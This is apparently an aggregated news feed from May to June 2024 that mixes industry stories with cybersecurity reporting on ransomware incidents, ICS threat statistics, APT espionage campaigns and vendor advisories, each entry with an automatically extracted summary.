  Australia wants to become a renewable energy superpower. Can it?

  industry
  2024-06-04 https://www.bbc.com/news/articles/cp00vyl6l6mo
  The country has come up with an ambitious plan to become the engine room of the new green economy. "

  Autosummary: Alpha HPA Alpha HPA already produces a range of ultra-high purity aluminium materials “This government has continued to approve new gas and coal projects - it"s flown to Japan, India, Korea, and Vietnam to secure long-term markets for gas and coal.Doing so, the government argues, is a national security priority, as countries examine their trade dependence on Beijing, and look to insulate themselves against supply chain shocks.“It’s a big opportunity for us to be an exporter of climate solutions to the world instead of climate problems,” John Grimes, who heads the Smart Energy Council, says. "

  ---

  Q1 2024 – a brief overview of the main incidents in industrial cybersecurity

  industry ciber
  2024-06-03 https://ics-cert.kaspersky.com/publications/q1-2024-a-brief-overview-of-the-main-incidents-in-industrial-cybersecurity/
  A total of 30 incidents were confirmed by victims. 37% of victims reported denial of operations or product shipment caused by the incident. Almost half of all incidents resulted in disruption of the victims’ public digital services. "

  Autosummary: The victims belong to the following industries/sectors: manufacturing (including automotive, aerospace, pharmaceutical, food and beverages, clothing, cosmetics and many other sub-sectors), utility , energy , transportation and logistics , engineering ,and mining . Electronics Foxsemicon hit by ransomware Manufacturing, electronics | Denial of IT services, data leakage, personal data leakage | Ransomware On January 15, semiconductor equipment manufacturer Foxsemicon Integrated Technology, a subsidiary of Taiwanese electronics giant Foxconn, was the victim of a cyberattack. Pharmaceutical HAL Allergy hit by ransomware Manufacturing, pharmaceutical | Data leakage, denial of services, product delivery delay | Ransomware On February 19, Dutch pharmaceutical company HAL Allergy Group was hit by a ransomware attack, according to a statement on its website. Veolia hit by ransomware Water supply, utility | Denial of IT systems, denial of services, personal data leakage | Ransomware The North American municipal water division of Veolia, a French transnational utility company, experienced a ransomware incident that impacted certain software applications and systems. Varta hit by cyberattack Manufacturing, automotive | Denial of IT systems, denial of operations Varta, a German manufacturer of batteries for the automotive, industrial and consumer sectors, disclosed that its systems were affected by a cyberattack on February 12. Hewlett Packard hit by cyberattack Manufacturing, electronics | Data leakage | APT On January 19, Hewlett Packard Enterprise filed a Form 8-K with the US Securities and Exchange Commission (SEC), reporting unauthorized access to the company’s cloud-based email environment by a threat actor believed to be Midnight Blizzard (aka Dukes, CozyBear and NOBELIUM/APT29/BlueBravo).The group said it had stolen 110GB of data from Lush, allegedly including many personal documents such as passport scans, and company documents related to accounting, finance, tax, projects, and customers. EAS hit by ransomware Manufacturing, engineering | Data leakage, denial of operations | Ransomware Dutch mechanical engineering and manufacturing company EAS Europe was the victim of a ransomware attack on February 26, according to a notice on its website. Logistics and transportation GCA hit by cyberattack Transportation, logistics | Denial of IT services French transport and logistics company GCA (Groupe Charles André) suffered a cyberattack during the night of February 17-18, resulting in an interruption of its internet access and the disruption of its usual communications, according to a message sent to its customers. Muscatine Power and Water hit by ransomware Water supply, energy, utility | Denial of IT services, personal data leakage | Ransomware US utility company Muscatine Power and Water (MPW) discovered a cybersecurity incident impacting its corporate network environment. Automotive ThyssenKrupp hit by cyberattack Manufacturing, automotive | Denial of IT systems, denial of operations German steelmaker and automotive supplier ThyssenKrupp said in a statement that it suffered a cyberattack that affected its auto body manufacturing division, ThyssenKrupp Automotive Body Solutions.The forensic investigation revealed that some current and former customer data, such as address, social security number, driver’s license, etc., may have been compromised in the incident. Etesia hit by cyberattack Manufacturing | Denial of IT systems, services and operations French mower manufacturer Etesia was the victim of a cyberattack on February 2, according to local press reports, forcing 160 employees to work part-time. Radiant Logistics hit by cyberattack Transportation, logistics | Denial of services Radiant Logistics, an international freight company, isolated its Canadian operations following a cybersecurity incident. "

  ---

  Can "energy hog" hot tubs be greener?

  industry
  2024-06-03 https://www.bbc.com/news/articles/cqllvze3204o
  Hot tubs are becoming a standard feature at holiday parks, but can they be made more energy efficient? "

  Autosummary: This led the company to institute a new hot tub policy, where guests have to pay more to use a hot tub in the summer, or if their hot tub requires a mid-week water change.“In the winter, most guests still want to opt in to the hot tub but increasingly in the summer, more and more guests are opting out,” says Al Judge, the cofounder of AliKats. "

  ---

  Week in review: Attackers trying to access Check Point VPNs, NIST CSF 2.0 security metrics evolution

  industry
  2024-06-02 https://www.helpnetsecurity.com/2024/06/02/week-in-review-attackers-trying-to-access-check-point-vpns-nist-csf-2-0-security-metrics-evolution/
  

  Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: RansomLord: Open-source anti-ransomware exploit tool RansomLord is an open-source tool that automates the creation of PE files, which are used to exploit ransomware pre-encryption. Attackers are probing Check Point Remote Access VPN devices Attackers are trying to gain access to Check Point VPN devices via local accounts protected only by passwords, the company has warned on Monday. How to combat … More →

  The post Week in review: Attackers trying to access Check Point VPNs, NIST CSF 2.0 security metrics evolution appeared first on Help Net Security.

  "

  Autosummary: Chronon: Open-source data platform for AI/ML applications Chronon is an open-source, end-to-end feature platform designed for machine learning (ML) teams to build, deploy, manage, and monitor data pipelines for machine learning. "

  ---

  Cyber Espionage Alert: LilacSquid Targets IT, Energy, and Pharma Sectors

  industry
  2024-05-30 https://thehackernews.com/2024/05/cyber-espionage-alert-lilacsquid.html
  A previously undocumented cyber espionage-focused threat actor named LilacSquid has been linked to targeted attacks spanning various sectors in the United States (U.S.), Europe, and Asia as part of a data theft campaign since at least 2021. "The campaign is geared toward establishing long-term access to compromised victim organizations to enable LilacSquid to siphon data of interest to "

  Autosummary: "

  ---

  Samsung Electronics union calls first-ever strike

  industry
  2024-05-29 https://www.bbc.com/news/articles/cx7768n6pnpo
  A full-scale strike at the firm could have an impact on the global supply chains of electronics. "

  Autosummary: Samsung Electronics union calls first-ever strike A union representing thousands of workers at Samsung Electronics has called the first strike at the South Korean technology giant since it was founded five and a half decades ago. "

  ---

  The evolution of security metrics for NIST CSF 2.0

  industry
  2024-05-28 https://www.helpnetsecurity.com/2024/05/28/cisos-security-metrics-nist-csf-2-0/
  

  CISOs have long been spreadsheet aficionados, soaking up metrics and using them as KPIs for security progress. These metrics have traditionally measured specific systems or single indicators — vulnerabilities detected, percentage of vulnerabilities patched, software and hardware asset inventory coverage, etc. The NIST Cybersecurity Framework (CSF) 2.0 underscored that metrics like these alone are insufficient and probably even improper when used as proxies for security outcomes. Siloed, narrow metrics do have a place in cybersecurity, … More →

  The post The evolution of security metrics for NIST CSF 2.0 appeared first on Help Net Security.

  "

  Autosummary: Why CISOs must equal weight metrics and process Yet, beneath this veneer of certainty lies a complex truth: individual metrics, while helpful, are fundamentally limited in that they only measure singular data points from siloed systems. Siloed metrics don’t tell the whole story: Narrow metrics may show the number of vulnerabilities patched but don’t capture root causes, how those vulnerabilities were prioritized, or if the most critical ones were addressed first. To understand why process metrics are a necessary complement to traditional siloed metrics, consider the recent attacks by Chinese and Russian hackers that allowed them to access email accounts of top US government officials and top Microsoft brass, respectively.These metrics have traditionally measured specific systems or single indicators — vulnerabilities detected, percentage of vulnerabilities patched, software and hardware asset inventory coverage, etc.More broadly, a narrow reliance on single data points, not metrics, as part of a more extensive process is dangerous for CISOs. "

  ---

  Ransomware operators shift tactics as law enforcement disruptions increase

  exploits industry
  2024-05-27 https://www.helpnetsecurity.com/2024/05/27/ransomware-attacks-surge-video/
  

  Ransomware remains one of the most pressing cybersecurity threats in 2024, with attackers continually evolving their methods to maximize impact and evade detection. In this Help Net Security round-up, we present excerpts from previously recorded videos featuring cybersecurity experts discussing ransomware-related topics such as payment practices, the recent surge in ransomware attacks, and more. Complete videos Steve Gwizdala, VP of Healthcare at ForgeRock, discusses how vigilance and new ways of enhancing cybersecurity measures will be … More →

  The post Ransomware operators shift tactics as law enforcement disruptions increase appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  Threat landscape for industrial automation systems. Q1 2024

  industry
  2024-05-27 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q1-2024/
  In the first quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.3 pp from the previous quarter to 21.4%. Compared to the first quarter of 2023, the percentage decreased by 1.3 pp. "

  Autosummary: 7.61% 5.84% -1.77 pp Spy Trojans, backdoors and keyloggers 3.86% 3.90% 0.04 pp Malicious documents (MSOffice + PDF) 2.02% 1.72% -0.30 pp Viruses 1.48% 1.56% 0.08 pp Worms 1.55% 1.51% -0.04 pp Miners in the form of executable filesfor Windows 0.84% 0.92% 0.08 pp Web miners running in browsers 0.45% 0.49% 0.04 pp Malware for AutoCAD 0.36% 0.41% 0.05 pp Ransomware 0.17% 0.15% -0.02 pp Main threat sources Internet 13.25% 12.24% -1.01pp Email clients 3.15% 3.04% -0.11pp Removable media 1.29% 1.13% -0.16pp Network folders 0.17% 0.15% -0.02pp Statistics across all threats In the first quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.3 pp from the previous quarter to 21.4%.This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) OT network administration computers ICS software development computers We consider a computer as attacked if a Kaspersky security solution blocked one or more threats on that computer during the period in review: a month, six months, or a year depending on the context as can be seen in the charts above. Malicious object categories Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose: Malicious objects used for initial infection Next-stage malware Self-propagating malware Malicious objects used for initial infection Malicious objects used for initial infection include dangerous web resources, malicious scripts, and malicious documents. Change in percentage of ICS computers blocked by various categories of malicious objects in Q1 2024 Compared to the previous quarter, in the first quarter of 2024, the most significant increase in the percentage of ICS computers on which malicious objects of various categories were blocked was as follows: AutoCAD malware – by 1.16 times. Percentage of ICS computers on which malicious objects were blocked, by month, 2021–2024 Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 34.2% in Africa to 11.5% in Northern Europe. "

  ---

  Threat landscape for industrial automation systems. Regions, Q1 2024

  industry
  2024-05-27 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-regions-q1-2024/
  The percentage of ICS computers on which malicious objects were blocked during the quarter varied regionally from 34.2% in Africa to 11.5% in Northern Europe. Africa and South-East Asia saw their percentages increase from the previous quarter. "

  Autosummary: The leading regions by percentage of ICS computers on which threats from these sources were blocked are the following: Internet threats Africa – 14.82% South-East Asia – 14.01% Email threats Southern Europe – 6.85% Latin America – 5.09% Denylisted internet resources The leading regions by percentage of ICS computers on which denylisted internet resources were blocked were: Africa – 8.78% Russia – 7.49% South Asia – 7.48% Malicious scripts and phishing pages The leading regions by percentage of ICS computers on which malicious scripts and phishing pages were blocked were: Latin America – 7.23% Southern Europe – 6.96% Middle East – 6.95% Malicious documents The leading regions by percentage of ICS computers on which malicious documents were blocked were: Southern Europe – 3.24% Latin America – 2.94% Eastern Europe – 2.33% Next-stage malware Malicious objects used to initially infect computers deliver next-stage malware – spyware, ransomware, and miners – to victims’ computers.In similar regional rankings, worms are in fourth place in four regions: Africa – 5.29% Central Asia – 2.88% Middle East – 2.40% South Asia – 1.95% The top regions for worms were the leading regions by percentage of ICS computers on which threats were blocked when connecting removable media: Africa – 5.60% South Asia – 2.46% Viruses The leading regions by percentage of ICS computers on which viruses were blocked were: South-East Asia – 7.61% Africa – 4.09% East Asia – 2.89% In South-East Asia, viruses are in first place (!) Covert crypto-mining programs Web miners running in browsers The leading regions by percentage of ICS computers on which web miners running in browsers were blocked were: Africa – 0.91% Middle East – 0.84% Australia and New Zealand – 0.78% In the regional rankings of threat categories by percentage of ICS computers on which they were blocked, web miners ended up in fifth place regionally (eighth place globally): Australia and New Zealand – 0.78% US and Canada – 0.45% Northern Europe – 0.27% In Q1 2024, the percentage of ICS computers on which web miners running in browsers were blocked increased in all regions except Russia and Central Asia. 20–25% Eastern Europe – 24.7% Russia – 23.6% Latin America – 23.5% South Asia – 23.5% Southern Europe – 21.4% East Asia – 20.3% Up to 20% Australia and New Zealand – 16.2% US and Canada – 13.3% Western Europe – 12.3% Northern Europe – 11.5% The third group contains the regions that are the safest in terms of cybersecurity. The three leading regions by percentage of ICS computers on which spyware was blocked were also the leading regions for malware from the first mentioned group: Africa – 6.65% Middle East – 5.89% Southern Europe – 5.45% In almost all regions, in the threat category rankings by percentage of ICS computers on which it was blocked, spyware does not rank higher than third place, except for two regions: East Asia : in this region, spyware is the number one malware category in terms of the percentage of ICS computers on which it was blocked, at 3.68%.Compared to the global figures, the region has a significantly higher percentage of ICS computers on which the following was blocked: AutoCAD malware, by 6.8 times Viruses, by 4 times Spyware, by 1.3 times Malicious documents, by 1.3 times Ransomware, by 1.2 times Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which the following was blocked: AutoCAD malware – by 1.4 times Viruses, by 1.2 times Current threats Viruses. Compared to the global average, the region has a higher percentage of ICS computers on which the following was blocked: Malicious documents, by 1.9 times Spyware, by 1.4 times Malicious scripts and phishing pages, by 1.2 times Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which covert crypto-mining malware was blocked: Miners in the form of executable files for Windows, by 1.7 times Web miners, by 1.6 times. Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which the following was blocked: Web miners, by 1.5 times Miners in the form of executable files for Windows, by 1.5 times Current threats Q1 2024 saw an increase in the percentage of ICS computers on which the following threats were blocked: Miners in the form of executable files for Windows Web miners The region is safe overall. South Asia – 2.46% Central Asia – 1.51% Worms The leading regions by percentage of ICS computers on which worms were blocked were: Africa – 5.29% Central Asia – 2.88% Middle East – 2.40% Globally, worms are in sixth place in the threat category ranking by percentage of ICS computers on which they were blocked. Spyware, by 1.5 times Viruses, by 1.5 times Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which covert crypto-mining malware was blocked: Web miners, by 1.3 times Miners in the form of executable files for Windows, by 1.2 times Current threats Ransomware From Q4 2022 through Q3 2023, the Middle East held second place in the regional ranking for this threat category. Compared to the global average, the region has a higher percentage of ICS computers on which the following was blocked: Malicious documents, by 1.7 times Malicious scripts and phishing pages, by 1.2 times Spyware, by 1.2 times Web miners Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which the following was blocked: Spyware, by 1.3 times Denylisted internet resources are slowly growing for the second quarter in a row. Covert crypto-mining programs Miners in the form of executable files for Windows The leading regions by percentage of ICS computers on which miners in the form of executable files for Windows were blocked were: Central Asia – 1.78% Russia – 1.38% Eastern Europe – 1.06% In the global rankings of threat categories by percentage of ICS computers on which they were blocked, miners in the form of Windows executable files are in seventh place. From a global perspective, it has a significantly higher percentage of ICS computers on which the following was blocked : Worms, by 3.5 times Viruses, by 2.6 times Spyware, by 1.7 times Ransomware, by 1.8 times Web miners, by 1.8 times Worms and viruses outpaced malicious documents in the threat category ranking by percentage of ICS computers on which they were blocked. Miners in the form of executable files for Windows, by 1.6 times AutoCAD malware – by 1.4 times Current threats Malicious scripts and phishing pages Q1 2024 saw an increase in the percentage of ICS computers on which the following threats were blocked: Web miners Miners in the form of executable files for Windows AutoCAD malware Based on the combination of indicators, the region is safe overall. All regions ranked by percentage of ICS computers on which malicious objects were blocked in the first quarter can be divided into three groups: Over 25% Africa – 32.4% South-East Asia – 29.7% Middle East – 26.9% Central Asia – 26.8% In the regions of this group, ICS cybersecurity requires close attention and improvement. Compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following was blocked: Viruses, by 1.9 times AutoCAD malware, by 3.6 times Quarterly changes Current threats Spyware Viruses AutoCAD malware It is likely that the active use of spyware by cybercriminals leads to a high percentage of compromised authentication data in industrial enterprise systems, which significantly increases the risks of subsequent targeted attacks. Compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following was blocked: Ransomware, by 1.9 times Web miners, by 1.7 times Worms, by 1.6 times Worms were fourth in the ranking of malware categories by percentage of ICS computers on which they were blocked (sixth globally). "

  ---

  Inside Operation Diplomatic Specter: Chinese APT Group"s Stealthy Tactics Exposed

  industry
  2024-05-23 https://thehackernews.com/2024/05/inside-operation-diplomatic-specter.html
  Governmental entities in the Middle East, Africa, and Asia are the target of a Chinese advanced persistent threat (APT) group as part of an ongoing cyber espionage campaign dubbed Operation Diplomatic Specter since at least late 2022. "An analysis of this threat actor’s activity reveals long-term espionage operations against at least seven governmental entities," Palo Alto Networks "

  Autosummary: The Chinese links to Operation Diplomatic Specter further stem from the use of operational infrastructure exclusively used by China-nexus groups like APT27, Mustang Panda, and Winnti, not to mention tools like the China Chopper web shell and PlugX. "The exfiltration techniques observed as part of Operation Diplomatic Specter provide a distinct window into the possible strategic objectives of the threat actor behind the attacks," the researchers concluded. "

  ---

  New Frontiers, Old Tactics: Chinese Espionage Group Targets Africa & Caribbean Govts

  industry
  2024-05-23 https://thehackernews.com/2024/05/new-frontiers-old-tactics-chinese-cyber.html
  The China-linked threat actor known as Sharp Panda has expanded their targeting to include governmental organizations in Africa and the Caribbean as part of an ongoing cyber espionage campaign. "The campaign adopts Cobalt Strike Beacon as the payload, enabling backdoor functionalities like C2 communication and command execution while minimizing the exposure of their custom tools," Check Point "

  Autosummary: The sustained strategic intrusions by Chinese threat actors in Africa against key industrial sectors, such as telecom service providers, financial institutions, and governmental bodies, align with the nation"s technological agenda in the region, tying into its Digital Silk Road (DSR) project announced in 2015. "

  ---

  Microsoft spots gift card thieves using cyber-espionage tactics

  industry
  2024-05-23 https://www.bleepingcomputer.com/news/security/microsoft-spots-gift-card-thieves-using-cyber-espionage-tactics/
  Microsoft has published a "Cyber Signals" report sharing new information about the hacking group Storm-0539 and a sharp rise in gift card theft as we approach the Memorial Day holiday in the United States. [...] "

  Autosummary: SMS phishing sent to targets ​​​​​​​Source: Microsoft Once they gain access to the target environment using stolen accounts, they register their own devices with the company"s multi-factor authentication (MFA) platforms for persistence and then move laterally by compromising virtual machines, VPNs, SharePoint, OneDrive, Salesforce, and Citrix environments. "

  ---

  Rockwell Advises Disconnecting Internet-Facing ICS Devices Amid Cyber Threats

  industry
  2024-05-22 https://thehackernews.com/2024/05/rockwell-advises-disconnecting-internet.html
  Rockwell Automation is urging its customers to disconnect all industrial control systems (ICSs) not meant to be connected to the public-facing internet to mitigate unauthorized or malicious cyber activity. The company said it"s issuing the advisory due to "heightened geopolitical tensions and adversarial cyber activity globally." To that end, customers are required to take immediate "

  Autosummary: "Cyber actors, including advanced persistent threat (APT) groups, have targeted OT/ICS systems in recent years to achieve political gains, economic advantages, and possibly to execute destructive effects," the NSA noted in September 2022. "

  ---

  Phishing statistics that will make you think twice before clicking

  financial industry
  2024-05-21 https://www.helpnetsecurity.com/2024/05/21/phishing-statistics-2024/
  

  This article includes excerpts from various reports that offer statistics and insights into the current phishing landscape. AI-driven phishing attacks deceive even the most aware users Zscaler | Zscaler ThreatLabz 2024 Phishing Report | May 2024 In 2023, the United States (55.9%), United Kingdom (5.6%) and India (3.9%) emerged as the top countries targeted by phishing scams. The finance and insurance sector experienced the highest number of overall phishing attempts, amounting to a 393% increase … More →

  The post Phishing statistics that will make you think twice before clicking appeared first on Help Net Security.

  "

  Autosummary: Proofpoint | 2024 State of the Phish | February 2024 And while the incidence of successful phishing attacks has slightly declined (71% of surveyed organizations experienced at least one successful attack in 2023 versus 84% the previous year), the negative consequences have soared: a 144% increase in reports of financial penalties, such as regulatory fines, and a 50% increase in reports of reputational damage. "

  ---

  Blackbasta group claims to have hacked Atlas, one of the largest US oil distributors

  industry
  2024-05-21 https://securityaffairs.com/163489/cyber-crime/blackbasta-claims-atlas-hack.html
  The Blackbasta extortion group claims to have hacked Atlas, one of the largest national distributors of fuel in the United States. Atlas is one of the largest national fuel distributors to 49 continental US States with over 1 billion gallons per year. The Blackbasta extortion group added the company to the list of victims on […] "

  Autosummary: Blackbasta group claims to have hacked Atlas, one of the largest US oil distributors Pierluigi Paganini May 21, 2024 May 21, 2024 The Blackbasta extortion group claims to have hacked Atlas, one of the largest national distributors of fuel in the United States. "

  ---

  Rockwell Automation warns admins to take ICS devices offline

  industry
  2024-05-21 https://www.bleepingcomputer.com/news/security/rockwell-automation-warns-admins-to-take-ics-devices-offline/
  Rockwell Automation warned customers to disconnect all industrial control systems (ICSs) not designed for online exposure from the Internet due to increasing malicious activity worldwide. [...] "

  Autosummary: "

  ---

  Cybercriminals shift tactics to pressure more victims into paying ransoms

  industry ciber
  2024-05-20 https://www.helpnetsecurity.com/2024/05/20/ransomware-claims-frequency-grow/
  

  Ransomware didn’t just grow in the US in 2023, it evolved, with the frequency of ransomware claims jumping 64% year-over-year, according to At-Bay. This was primarily driven by an explosion in “indirect” ransomware incidents which increased by more than 415% in 2023 than in 2022. Standing out among the biggest loss drivers were remote access tools, which accounted for 58% of ransomware attacks. Double leverage attacks – those using both data encryption and exfiltration – … More →

  The post Cybercriminals shift tactics to pressure more victims into paying ransoms appeared first on Help Net Security.

  "

  Autosummary: Ransomware didn’t just grow in the US in 2023, it evolved, with the frequency of ransomware claims jumping 64% year-over-year, according to At-Bay. "

  ---

  Strata Identity Maverics Identity Continuity provides real-time IDP failover capabilities

  ransomware industry
  2024-05-20 https://www.helpnetsecurity.com/2024/05/20/strata-identity-maverics-identity-continuity/
  

  Strata Identity announced Maverics Identity Continuity, a new add-on product to its Maverics Identity Orchestration platform that provides always-on identity continuity in multi-cloud environments. Unlike regional redundancy offerings from cloud providers and existing backup and restore products that only shorten the time it takes to rebuild IDP (primary identity provider) infrastructures after an outage, Strata’s Identity Continuity product maintains uninterrupted identity services by autonomously and transparently failing over to an alternate IDP. With many organizations … More →

  The post Strata Identity Maverics Identity Continuity provides real-time IDP failover capabilities appeared first on Help Net Security.

  "

  Autosummary: The need for always-on identity Traditional identity resilience offerings are limited to providing disaster recovery using point-in-time IDP policy configuration backups, but cannot prevent a business’ mission-critical applications from going offline. "

  ---

  Cuba laments collapse of iconic sugar industry

  industry
  2024-05-18 https://www.bbc.co.uk/news/world-latin-america-68935247
  For centuries, sugar was the mainstay of Cuba"s economy. Now the industry is in rapid decline. "

  Autosummary: "

  ---

  Too many ICS assets are exposed to the public internet

  industry
  2024-05-17 https://www.helpnetsecurity.com/2024/05/17/organizations-expanding-attack-surface/
  

  The enterprise attack surface is expanding in multiple ways, becoming more numerous and more specific, according to runZero. “Our research reveals alarming gaps and unexpected trends in enterprise infrastructure, including the decay of network segmentation, persistent challenges in attack surface management, and the increasing volume of dark matter on modern networks,” said HD Moore, CEO. IT and OT are converging, expanding the attack surface of organizations and requiring new techniques to discover and manage assets. … More →

  The post Too many ICS assets are exposed to the public internet appeared first on Help Net Security.

  "

  Autosummary: “Our research reveals alarming gaps and unexpected trends in enterprise infrastructure, including the decay of network segmentation, persistent challenges in attack surface management, and the increasing volume of dark matter on modern networks,” said HD Moore, CEO. "

  ---

  Ransomware statistics that reveal alarming rate of cyber extortion

  exploits industry
  2024-05-15 https://www.helpnetsecurity.com/2024/05/15/ransomware-statistics-2024/
  

  In this article, you will find excerpts from various reports that offer statistics and insights about the current ransomware landscape. Global ransomware crisis worsens NTT Security Holdings | 2024 Global Threat Intelligence Report | May 2024 Ransomware and extortion incidents surged by 67% in 2023 Manufacturing topped the list of attack sectors in 2023 at 25.66% and had the most ransomware victims posted on social channels with 27.75%. Ransomware attacks impact 20% of sensitive data … More →

  The post Ransomware statistics that reveal alarming rate of cyber extortion appeared first on Help Net Security.

  "

  Autosummary: According to the data, 1,075 leak site ransomware victims were posted on leak sites during the first quarter of 2024, despite the disruption of two major ransomware groups, LockBit and ALPHV/BlackCat, which accounted for 22% and 8% of the activity, respectively. "

  ---

  Tailoring responsible AI: Defining ethical guidelines for industry-specific use

  industry
  2024-05-14 https://www.helpnetsecurity.com/2024/05/14/chris-peake-smartsheet-responsible-ai/
  

  In this Help Net Security interview, Chris Peake, CISO & SVP at Smartsheet, explains how responsible AI should be defined by each organization to guide their AI development and usage. Peake emphasizes that implementing responsible AI requires balancing ethical considerations, industry regulations, and proactive risk assessment to ensure that AI is used transparently. How should businesses and governments implement responsible AI to ensure ethical alignment, particularly in industries heavily reliant on AI? Responsible AI can … More →

  The post Tailoring responsible AI: Defining ethical guidelines for industry-specific use appeared first on Help Net Security.

  "

  Autosummary: This includes: Publicly sharing your AI principles Acknowledging the challenges you expect to encounter as you develop your AI systems Training your employees how to comply with the principles and use AI in a responsible way Publicly sharing exactly how your company’s AI systems work Once you’ve taken these steps, you can start aligning AI with products and services to drive better results responsibly.Since generative AI is still relatively new and evolving, I like to take a scientific approach to this process, including documenting the facts we know today, what we expect in the future, and the subsequent outcomes.Security, IT, and governance teams, in particular, must anticipate how AI abuse can impact their organizations. "

  ---

  Cow dung"s key role in India"s energy industry

  industry
  2024-05-13 https://www.bbc.com/news/articles/c254ggrry45o
  India is hoping that biogas, produced from farm waste, will curb its reliance on imported gas. "

  Autosummary: Error. "

  ---

  Widely used modems in industrial IoT devices open to SMS attack

  industry
  2024-05-10 https://www.bleepingcomputer.com/news/security/widely-used-modems-in-industrial-iot-devices-open-to-sms-attack/
  Security flaws in Telit Cinterion cellular modems, widely used in sectors including industrial, healthcare, and telecommunications, could allow remote attackers to execute arbitrary code via SMS. [...] "

  Autosummary: Although the research targeted the Cinterion EHS5-E series modem, because other products from the vendor have similar software and hardware architecture additional variants are also impacted: Cinterion BGS5 Cinterion EHS5/6/7 Cinterion PDS5/6/8 Cinterion ELS61/81 Cinterion PLS62 Telit fixed some of the disclosed vulnerabilities but some remain unpatched, Kaspersky told BleepingComputer. "

  ---

  Regulators are coming for IoT device security

  industry
  2024-05-09 https://www.helpnetsecurity.com/2024/05/09/iot-device-security/
  

  Cybersecurity is a relatively new challenge for many IoT device makers who have traditionally produced non-connected devices. These devices were less vulnerable to exploitation and, as a result, manufacturers often lack the expertise and experience needed to effectively secure their connected products. IoT devices are built on a foundation of insecure software—a large portion of the open-source software and the chips used to build devices are poorly secured. Chipmakers are constantly getting caught sneaking hidden … More →

  The post Regulators are coming for IoT device security appeared first on Help Net Security.

  "

  Autosummary: While we do not yet know how aggressively regulators will enforce these new statutes, we recommend IoT manufacturers start investing in the following security features: Over-the-air (OTA) software update: The ability to update your device’s software is your escape hatch in the event a security issue is discovered after your device has shipped. Observability: Catching and fixing software bugs such as buffer overflows reinforces the security of your device, and monitoring via metrics can help you identify compromises (e.g., by spotting odd network usage patterns by a device).The device must be capable of identifying, logging, and reporting security events (e.g., compromises) to its manufacturer. "

  ---

  Sumo Logic’s analytics capabilities allow security teams to find insights within their data

  industry
  2024-05-07 https://www.helpnetsecurity.com/2024/05/07/sumo-logic-security-analytics-capabilities/
  

  Sumo Logic announced new AI and security analytics capabilities that allow security and development teams to align around a single source of truth and collect and act on data insights more quickly. These advancements, bolstered by Sumo Logic’s free data ingest licensing, empower customers to use their critical security data to close security gaps and better fuel DevSecOps. A recent Cloud Security Alliance survey found that only 30% of respondents believe they have good collaboration … More →

  The post Sumo Logic’s analytics capabilities allow security teams to find insights within their data appeared first on Help Net Security.

  "

  Autosummary: “We’re excited to deliver new security innovations leveraging AI and deeper threat intelligence, all wrapped around our new Flex Licensing model – removing the economic and collaboration barriers by ingesting, storing and analyzing all security log events in the Sumo Logic SaaS Log Analytics Platform, so Dev, Sec and Ops teams have a single place to monitor and secure their apps and infrastructure,” added Kim. New capabilities include: New integrated threat intelligence : By integrating an out-of-the-box threat intelligence feed and third-party feeds with security log data, Sumo Logic is strengthening security postures and providing earlier threat detection. "

  ---

  How to prepare for the CISSP exam: Tips from industry leaders

  industry
  2024-05-06 https://www.helpnetsecurity.com/2024/05/06/how-to-cissp-exam-prep/
  

  The Certified Information Systems Security Professional (CISSP) is the most widely recognized certification in the information security industry. CISSP certifies that an information security professional possesses extensive technical and managerial expertise for designing, engineering, and managing an organization’s security stance. In this article, CISSP-certified cybersecurity leaders provide practical tips and strategies to help candidates navigate the extensive study requirements and effectively manage their CISSP exam prep time. Whether you’re just starting your study journey or … More →

  The post How to prepare for the CISSP exam: Tips from industry leaders appeared first on Help Net Security.

  "

  Autosummary: Even though I had over five years of experience in cybersecurity and over ten years in IT, my practical knowledge was only in specific domains (i.e. Security and Risk Management, Asset Security, Communications and Network Security, etc.). Looking back at the exam itself, I believe that having a strong knowledge foundation, coupled with real-life experience, and a network of colleagues you can always turn to and discuss certain topics you are less familiar with, is the key to success in passing the CISSP exam.Now, this may all sound easy, but the truth is that by the time I decided to pursue the CISSP, I already had 13 years of experience, numerous other industry certifications, and had been deeply involved in the cybersecurity field since the day I graduated; my Master’s thesis was also in cybersecurity. Ryan Williams Sr., IT Security Analyst, Buddobot Here’s how I effectively studied for the CISSP certification, relying solely on comprehensive study materials rather than quick-fix dumps or quizlets. Shannon Brewster, Executive Director, General Manager, AT&T Cybersecurity Passing the CISSP exam is an ambitious goal, especially if you hope to pass on your first attempt. Andrea Szeiler-Zengo, President of the Women4Cyber Hungarian Chapter When I decided to get CISSP certified, I signed up for local training, but honestly, I learned more independently than in class. This structured approach to studying for the CISSP took approximately 6 months, using a mix of reading, practical exercises, and motivational content, equipped me with the knowledge and confidence to successfully pass the exam. "

  ---

  From likes to votes: How influencers are changing Indian politics

  industry
  2024-05-04 https://www.bbc.co.uk/news/world-asia-india-68920953
  Politicians are roping in influencers to woo voters like never before. But is this a good thing? "

  Autosummary: "

  ---

  Expert-Led Webinar - Uncovering Latest DDoS Tactics and Learn How to Fight Back

  industry
  2024-05-03 https://thehackernews.com/2024/05/expert-led-webinar-learn-latest-ddos.html
  In today"s rapidly evolving digital landscape, the threat of Distributed Denial of Service (DDoS) attacks looms more significant than ever. As these cyber threats grow in sophistication, understanding and countering them becomes crucial for any business seeking to protect its online presence. To address this urgent need, we are thrilled to announce our upcoming webinar, "Uncovering Contemporary "

  Autosummary: What You Will Learn: Understanding the Threat: Explore the escalated risks DDoS attacks pose to your business, including recent advancements in attack strategies like IoT botnets and amplification tactics. "

  ---

  How the computer games industry is embracing AI

  industry
  2024-05-02 https://www.bbc.co.uk/news/business-68844761
  Developing computer games can be wildly expensive so some hope that AI can cut the cost. "

  Autosummary: "

  ---
